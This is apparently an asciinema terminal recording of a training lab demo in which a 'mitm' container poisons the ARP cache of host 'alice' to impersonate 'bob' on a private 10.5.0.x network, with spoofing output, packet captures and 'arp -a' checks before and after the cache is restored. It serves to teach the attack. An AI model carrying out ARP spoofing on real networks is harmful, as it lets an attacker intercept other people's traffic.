[55.889384, "o", "\u001b[?25l\u001b[1;73H0:4\u001b[K\u001b[2;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[3;73H0:4\u001b[K\u001b[4;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[5;73H0:4\u001b[K\u001b[6;73H^CCleaning up and re-arping targets...\u001b[K\u001b[7;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[8;73H0:3\u001b[K\u001b[9;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[10;73H0:3\u001b[K\u001b[11;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[12;73H0:3\u001b[K\u001b[13;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[14;73H0:3\u001b[K\u001b[15;73H\u001b[K\u001b[?12l\u001b[?25h\u001b[12D"]
[55.898968, "o", "e"]
[55.924923, "o", "\u001b[?25l\u001b[17;73H8\u001b[K\u001b[18;73H12:43:44.786644 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:03, length 2\u001b[19;73H8\u001b[K\u001b[20;73H12:43:45.812144 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[21;73H8\u001b[K\u001b[22;73H12:43:46.604963 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:03, length 2\u001b[23;73H8\u001b[K\u001b[24;73H12:43:47.605391 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:03, length 2\u001b[25;73H8\u001b[K\u001b[26;73H12:43:48.605745 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:03, length 2\u001b[27;73H8\u001b[K\u001b[28;73H12:43:49.606221 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:03, length 2\u001b[29;73H8\u001b[K\u001b[30;73H\u001b[K\u001b[?12l\u001b[?25h\u001b[15;62H"]
[55.973694, "o", " "]
[56.049566, "o", "i"]
[56.1258, "o", "s"]
[56.199583, "o", " "]
[56.274882, "o", "r"]
[56.351854, "o", "e"]
[56.428934, "o", "s"]
[56.504205, "o", "t"]
[56.579544, "o", "o"]
[56.654577, "o", "\u001b[?25l\u001b[H[10.5.0.2] alice / # ping 10.5.0.3 -c 1\u001b[32X\r\nPING 10.5.0.3 (10.5.0.3): 56 data bytes\u001b[32X\r\n64 bytes from 10.5.0.3: seq=0 ttl=64 time=0.234 ms\u001b[21X\u001b[4;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.234/0.234/0.234 ms\u001b[26X\r\n[10.5.0.2] alice / # # check the poisoned ARP table\u001b[20X\r\n[10.5.0.2] alice / # ##### ARP table #####\u001b[29X\u001b[10;71H\u001b[1K\r[10.5.0.2] alice / # arp -a\r\narp-bob-1.arp_arp (10.5.0.3) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[5X\r\narp-mitm-1.arp_arp (10.5.0.4) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[4X\r\n[10.5.0.2] alice / # # check BOB's MAC address ends 00:04\u001b[14X\r\n[10.5.0.2] alice / # # once the poisioning stopped, ARP table is restor\u001b[15;71H\u001b[1K\r \u001b[?12l\u001b[?25h\r"]
[56.730322, "o", "e"]
[56.804926, "o", "d"]
[56.880463, "o", "."]
[56.887957, "o", "\u001b[?25l\u001b[1;73H0:4\u001b[K\u001b[2;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[3;73H0:4\u001b[K\u001b[4;73H^CCleaning up and re-arping targets...\u001b[K\u001b[5;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[6;73H0:3\u001b[K\u001b[7;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[8;73H0:3\u001b[K\u001b[9;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[10;73H0:3\u001b[K\u001b[11;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[12;73H0:3\u001b[K\u001b[13;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[14;73H0:3\u001b[K\u001b[15;73H\u001b[K\u001b[?12l\u001b[?25h\u001b[4G"]
[56.954347, "o", " "]
[56.96439, "o", "\u001b[?25l\u001b[17;73H8\u001b[K\u001b[18;73H12:43:45.812144 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:04, length 2\u001b[19;73H8\u001b[K\u001b[20;73H12:43:46.604963 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:03, length 2\u001b[21;73H8\u001b[K\u001b[22;73H12:43:47.605391 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:03, length 2\u001b[23;73H8\u001b[K\u001b[24;73H12:43:48.605745 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:03, length 2\u001b[25;73H8\u001b[K\u001b[26;73H12:43:49.606221 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:03, length 2\u001b[27;73H8\u001b[K\u001b[28;73H12:43:50.606617 ARP, Reply 10.5.0.3 is-at 02:42:0a:05:00:03, length 2\u001b[29;73H8\u001b[K\u001b[30;73H\u001b[K\u001b[?12l\u001b[?25h\u001b[15;5H"]
[57.030227, "o", "s"]
[57.104823, "o", "l"]
[57.178594, "o", "e"]
[57.2552, "o", "e"]
[57.32965, "o", "p"]
[57.405815, "o", " "]
[57.479379, "o", "3"]
[57.481301, "o", "\u001b[?25l\u001b[HPING 10.5.0.3 (10.5.0.3): 56 data bytes\u001b[32X\r\n64 bytes from 10.5.0.3: seq=0 ttl=64 time=0.234 ms\u001b[21X\u001b[3;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.234/0.234/0.234 ms\u001b[26X\r\n[10.5.0.2] alice / # # check the poisoned ARP table\u001b[20X\r\n[10.5.0.2] alice / # ##### ARP table #####\u001b[29X\u001b[9;71H\u001b[1K\r[10.5.0.2] alice / # arp -a\r\narp-bob-1.arp_arp (10.5.0.3) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[5X\r\narp-mitm-1.arp_arp (10.5.0.4) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[4X\r\n[10.5.0.2] alice / # # check BOB's MAC address ends 00:04\u001b[14X\r\n[10.5.0.2] alice / # # once the poisioning stopped, ARP table is restor\u001b[14;71H\u001b[1K\red. sleep 3\u001b[15;71H\u001b[1K\u001b[?12l\u001b[?25h\r\u001b[?2004l"]
[57.483655, "o", "[10.5.0.2] alice / # \u001b[?2004h"]
[57.899321, "o", "\u001b[?25l\u001b[1;73H0:4\u001b[K\u001b[2;73H^CCleaning up and re-arping targets...\u001b[K\u001b[3;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[4;73H0:3\u001b[K\u001b[5;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[6;73H0:3\u001b[K\u001b[7;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[8;73H0:3\u001b[K\u001b[9;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[10;73H0:3\u001b[K\u001b[11;73H2:42:a:5:0:4 2:42:a:5:0:2 0806 42: arp reply 10.5.0.3 is-at 2:42:a:5:\u001b[12;73H0:3\u001b[K\u001b[13;73H\u001b[K\u001b[34m\u001b[1m\u001b(0\nlqq\u001b(B\u001b(B\u001b[m\u001b[34m\u001b[1m(\u001b[31mroot__mitm\u001b[34m)-[\u001b[39m/\u001b[34m]\u001b(B\u001b[m\u001b[K\u001b[34m\u001b[1m\u001b(0\u001b[15;73Hmq\u001b(B\u001b(B\u001b[m\u001b[31m\u001b[1m#\u001b(B\u001b[m \u001b[K\u001b[1;72H\u001b[32m\u001b(0x\u001b[2;72Hx\u001b[3;72Hx\u001b[4;72Hx\u001b[5;72Hx\u001b[6;72Hx\u001b[7;72Hx\u001b[8;72Hx\u001b[9;72Hx\u001b[10;72Hx\u001b[11;72Hx\u001b[12;72Hx\u001b[13;72Hx\u001b[14;72Hx\u001b[15;72Hx\r\nqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqn\u001b[39mqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq\u001b[17;72Hx\u001b[18;72Hx\u001b[19;72Hx\u001b[20;72Hx\u001b[21;72Hx\u001b[22;72Hx\u001b[23;72Hx\u001b[24;72Hx\u001b[25;72Hx\u001b[26;"]
[57.899453, "o", "72Hx\u001b[27;72Hx\u001b[28;72Hx\u001b[29;72Hx\u001b[30;72Hx\u001b(B\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[15;22H"]
[60.558964, "o", "a"]
[60.635177, "o", "r"]
[60.710805, "o", "p"]
[60.785443, "o", " "]
[60.860969, "o", "-"]
[60.93521, "o", "a"]
[60.938654, "o", "\u001b[?25l\u001b[H64 bytes from 10.5.0.3: seq=0 ttl=64 time=0.234 ms\u001b[21X\u001b[2;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.234/0.234/0.234 ms\u001b[26X\r\n[10.5.0.2] alice / # # check the poisoned ARP table\u001b[20X\r\n[10.5.0.2] alice / # ##### ARP table #####\u001b[29X\u001b[8;71H\u001b[1K\r[10.5.0.2] alice / # arp -a\r\narp-bob-1.arp_arp (10.5.0.3) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[5X\r\narp-mitm-1.arp_arp (10.5.0.4) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[4X\r\n[10.5.0.2] alice / # # check BOB's MAC address ends 00:04\u001b[14X\r\n[10.5.0.2] alice / # # once the poisioning stopped, ARP table is restor\u001b[13;71H\u001b[1K\red. sleep 3\u001b[14;71H\u001b[1K\r[10.5.0.2] alice / # arp -a\u001b[15;71H\u001b[1K\u001b[?12l\u001b[?25h\r\u001b[?2004l\u001b[?25l\u001b[1;71H\u001b[1K\n\u001b[1K\r--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.234/0.234/0.234 ms\u001b[26X\r\n[10.5.0.2] alice / # # check the poisoned ARP table\u001b[20X\r\n[10.5.0.2] alice / # ##### ARP table ##"]
[60.938835, "o", "###\u001b[29X\u001b[7;71H\u001b[1K\r[10.5.0.2] alice / # arp -a\r\narp-bob-1.arp_arp (10.5.0.3) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[5X\r\narp-mitm-1.arp_arp (10.5.0.4) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[4X\r\n[10.5.0.2] alice / # # check BOB's MAC address ends 00:04\u001b[14X\r\n[10.5.0.2] alice / # # once the poisioning stopped, ARP table is restor\u001b[12;71H\u001b[1K\red. sleep 3\u001b[13;71H\u001b[1K\r[10.5.0.2] alice / # arp -a\r\narp-bob-1.arp_arp (10.5.0.3) at 02:42:0a:05:00:03 [ether]  on eth0\u001b[5X\u001b[15;71H\u001b[1K\u001b[?12l\u001b[?25h\r"]
[60.939294, "o", "\u001b[?25l\u001b[1;71H\u001b[1K\u001b[H--- 10.5.0.3 ping statistics ---\r\n1 packets transmitted, 1 packets received, 0% packet loss\u001b[14X\r\nround-trip min/avg/max = 0.234/0.234/0.234 ms\u001b[26X\r\n[10.5.0.2] alice / # # check the poisoned ARP table\u001b[20X\r\n[10.5.0.2] alice / # ##### ARP table #####\u001b[29X\u001b[6;71H\u001b[1K\r[10.5.0.2] alice / # arp -a\r\narp-bob-1.arp_arp (10.5.0.3) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[5X\r\narp-mitm-1.arp_arp (10.5.0.4) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[4X\r\n[10.5.0.2] alice / # # check BOB's MAC address ends 00:04\u001b[14X\r\n[10.5.0.2] alice / # # once the poisioning stopped, ARP table is restor\u001b[11;71H\u001b[1K\red. sleep 3\u001b[12;71H\u001b[1K\r[10.5.0.2] alice / # arp -a\r\narp-bob-1.arp_arp (10.5.0.3) at 02:42:0a:05:00:03 [ether]  on eth0\u001b[5X\r\narp-mitm-1.arp_arp (10.5.0.4) at 02:42:0a:05:00:04 [ether]  on eth0\u001b[4X\u001b[15;71H\u001b[1K\u001b[?12l\u001b[?25h\r"]
[60.942235, "o", "[10.5.0.2] alice / # \u001b[?2004h"]
[65.19361, "o", "\u001b[1;31r\u001b(B\u001b(B\u001b[m\u001b[?1l\u001b>\u001b[H\u001b[2J\u001b[?2004l\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?1006l\u001b[?1005l\u001b[?7727l\u001b[?1004l\u001b[?1049l\u001b[23;0;0t[detached (from session demo)]\r\n"]
[65.264412, "o", "\u001b[?2004h\u001b[38;5;250m\u001b[48;5;240m .../prj/cydrill/arp \u001b[38;5;240m\u001b[49m\u001b[0m "]
[68.488628, "o", "\u001b[?2004l\r\r\n"]
[68.488873, "o", "exit\r\n"]
